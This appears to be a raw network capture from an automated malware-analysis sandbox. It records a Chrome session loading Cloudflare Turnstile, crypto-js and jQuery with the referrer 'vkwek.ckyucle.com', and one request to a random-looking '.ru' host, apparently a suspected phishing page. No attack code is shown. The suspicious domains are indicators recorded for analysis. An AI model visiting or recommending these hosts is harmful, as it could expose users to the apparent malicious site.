                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:40:33 UTC336INHTTP/1.1 200 OK
                                                              Content-Length: 0
                                                              access-control-max-age: 86400
                                                              access-control-allow-methods: POST, OPTIONS
                                                              access-control-allow-origin: *
                                                              access-control-allow-headers: content-type, content-length
                                                              date: Wed, 03 Jul 2024 07:40:32 GMT
                                                              Via: 1.1 google
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              10192.168.2.64972923.43.61.160443
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:33 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Accept: */*
                                                              Accept-Encoding: identity
                                                              User-Agent: Microsoft BITS/7.8
                                                              Host: fs.microsoft.com
                                                              2024-07-03 07:40:33 UTC467INHTTP/1.1 200 OK
                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                              Content-Type: application/octet-stream
                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                              Server: ECAcc (lpl/EF06)
                                                              X-CID: 11
                                                              X-Ms-ApiVersion: Distribute 1.2
                                                              X-Ms-Region: prod-neu-z1
                                                              Cache-Control: public, max-age=116923
                                                              Date: Wed, 03 Jul 2024 07:40:33 GMT
                                                              Connection: close
                                                              X-CID: 2


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              11192.168.2.64973035.190.80.14434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:33 UTC476OUTPOST /report/v4?s=ntbk1%2B0p%2FKPbnMlpunK%2FF02vxwHxUZE18hSmg6Vb0qrDO1qETED2rd35kRiENcKsGxXLOLDj2AImaw2XunnKdVpn9pEm0zkIHs2vWLzhjlhx9Uq7jOEqVhvsUixkPw%3D%3D HTTP/1.1
                                                              Host: a.nel.cloudflare.com
                                                              Connection: keep-alive
                                                              Content-Length: 428
                                                              Content-Type: application/reports+json
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:40:33 UTC428OUTData Raw: 5b 7b 22 61 67 65 22 3a 33 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 30 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 76 6b 77 65 6b 2e 63 6b 79 75 63 6c 65 2e 63 6f 6d 2f 32 44 55 78 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22
                                                              Data Ascii: [{"age":3,"body":{"elapsed_time":109,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://vkwek.ckyucle.com/2DUx/","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.error"},"type":"network-error","
                                                              2024-07-03 07:40:33 UTC168INHTTP/1.1 200 OK
                                                              Content-Length: 0
                                                              date: Wed, 03 Jul 2024 07:40:33 GMT
                                                              Via: 1.1 google
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              12192.168.2.649732104.17.3.1844434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:34 UTC649OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                              Host: challenges.cloudflare.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: */*
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: script
                                                              Referer: https://vkwek.ckyucle.com/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:40:34 UTC336INHTTP/1.1 302 Found
                                                              Date: Wed, 03 Jul 2024 07:40:34 GMT
                                                              Content-Length: 0
                                                              Connection: close
                                                              access-control-allow-origin: *
                                                              cache-control: max-age=300, public
                                                              cross-origin-resource-policy: cross-origin
                                                              location: /turnstile/v0/g/d2a97f6b6ec9/api.js
                                                              Server: cloudflare
                                                              CF-RAY: 89d53a69aa7417a5-EWR
                                                              alt-svc: h3=":443"; ma=86400


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              13192.168.2.649734188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:34 UTC400OUTGET /5575968202461485388865565DuGzcrTyOZLFNLDIYSVXZDPOLLDSEDNQMSF HTTP/1.1
                                                              Host: nzd92.6gniu68.ru
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:40:34 UTC608INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:40:34 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Access-Control-Allow-Origin: *
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ms5m%2BLV69EaJ5sGPzCIHSirNEN6%2Fehv%2B0BZdINeH3WYt3Y4LHLrrPrYACiJtOBYvwxVLch%2F356tb5QX%2BA81beve0E5UpCkHflCMl8VPT9oloHF1784DPyhX3Qcv7hbQ6ivPy"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 89d53a69b90c32fc-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-07-03 07:40:34 UTC6INData Raw: 31 0d 0a 30 0d 0a
                                                              Data Ascii: 10
                                                              2024-07-03 07:40:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              14192.168.2.649733104.17.24.144434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:34 UTC651OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                              Host: cdnjs.cloudflare.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: */*
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: script
                                                              Referer: https://vkwek.ckyucle.com/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:40:34 UTC959INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:40:34 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Access-Control-Allow-Origin: *
                                                              Cache-Control: public, max-age=30672000
                                                              ETag: W/"61182885-40eb"
                                                              Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                              cf-cdnjs-via: cfworker/kv
                                                              Cross-Origin-Resource-Policy: cross-origin
                                                              Timing-Allow-Origin: *
                                                              X-Content-Type-Options: nosniff
                                                              CF-Cache-Status: HIT
                                                              Age: 4062856
                                                              Expires: Mon, 23 Jun 2025 07:40:34 GMT
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gNnUJ6u7LeXIhVA78p8ArYd67ZWqzpw31Lmzol6Y2gxZt1qlkLrncscD5Kq92eWhdsppqePX%2BYxJCvNGTdtp%2BcIolhmJD6MaDyLn11C4K1G8SHtHX3KdErMNx%2FyAN67owyK0xc2z"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                              Strict-Transport-Security: max-age=15780000
                                                              Server: cloudflare
                                                              CF-RAY: 89d53a69bf52195d-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-07-03 07:40:34 UTC410INData Raw: 33 39 39 38 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                              Data Ascii: 3998!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                              2024-07-03 07:40:34 UTC1369INData Raw: 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65
                                                              Data Ascii: f globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.cre
                                                              2024-07-03 07:40:34 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73
                                                              Data Ascii: call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes
                                                              2024-07-03 07:40:34 UTC1369INData Raw: 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63
                                                              Data Ascii: peof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c
                                                              2024-07-03 07:40:34 UTC1369INData Raw: 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e
                                                              Data Ascii: var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>
                                                              2024-07-03 07:40:34 UTC1369INData Raw: 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30
                                                              Data Ascii: for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0
                                                              2024-07-03 07:40:34 UTC1369INData Raw: 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66
                                                              Data Ascii: r,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:f
                                                              2024-07-03 07:40:34 UTC1369INData Raw: 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50
                                                              Data Ascii: harAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOP
                                                              2024-07-03 07:40:34 UTC1369INData Raw: 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69
                                                              Data Ascii: a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=thi
                                                              2024-07-03 07:40:34 UTC1369INData Raw: 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41
                                                              Data Ascii: ),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              15192.168.2.649731151.101.130.1374434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:34 UTC623OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                              Host: code.jquery.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: */*
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: script
                                                              Referer: https://vkwek.ckyucle.com/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:40:34 UTC567INHTTP/1.1 200 OK
                                                              Connection: close
                                                              Content-Length: 89501
                                                              Server: nginx
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                              ETag: "28feccc0-15d9d"
                                                              Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                              Access-Control-Allow-Origin: *
                                                              Via: 1.1 varnish, 1.1 varnish
                                                              Accept-Ranges: bytes
                                                              Age: 1397005
                                                              Date: Wed, 03 Jul 2024 07:40:34 GMT
                                                              X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890097-NYC
                                                              X-Cache: HIT, HIT
                                                              X-Cache-Hits: 52, 0
                                                              X-Timer: S1719992434.193637,VS0,VE1
                                                              Vary: Accept-Encoding
                                                              2024-07-03 07:40:34 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
